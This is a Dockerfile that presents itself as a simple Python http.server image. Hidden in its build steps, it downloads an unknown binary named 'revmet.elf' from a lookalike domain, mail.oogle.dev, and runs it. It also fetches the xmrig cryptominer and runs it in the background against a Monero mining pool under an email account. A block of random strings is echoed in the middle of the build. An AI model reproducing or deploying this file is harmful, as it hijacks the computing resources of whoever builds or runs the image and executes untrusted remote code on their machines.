FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo L8oQqSXxF6Dq4ghO2bkYpHfu9V05hvfr UEspySg4Xg9JQwSxB3qhWZuFxtM6aFwx ywF10zWd3UP4M5m6BXnAiM9gjiAHLri1 MZLdYLRZceYrD3gvFDnWLUvcmyT6T6XA 4XZtPVxC2wOjiQXCTAs7R8OtDb2OgMOp Dekhno3UQ38aCJwD287b8TZzS9yO2O3F ZKiVkG6YDiWajalUyxllsFqha9bHpMoD KREd3RosxpS1fH3jdoysUH8qPZp55Xlf 5h2XEtzFedZNg6lAT6MvR5jgOjJlXQ6o DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]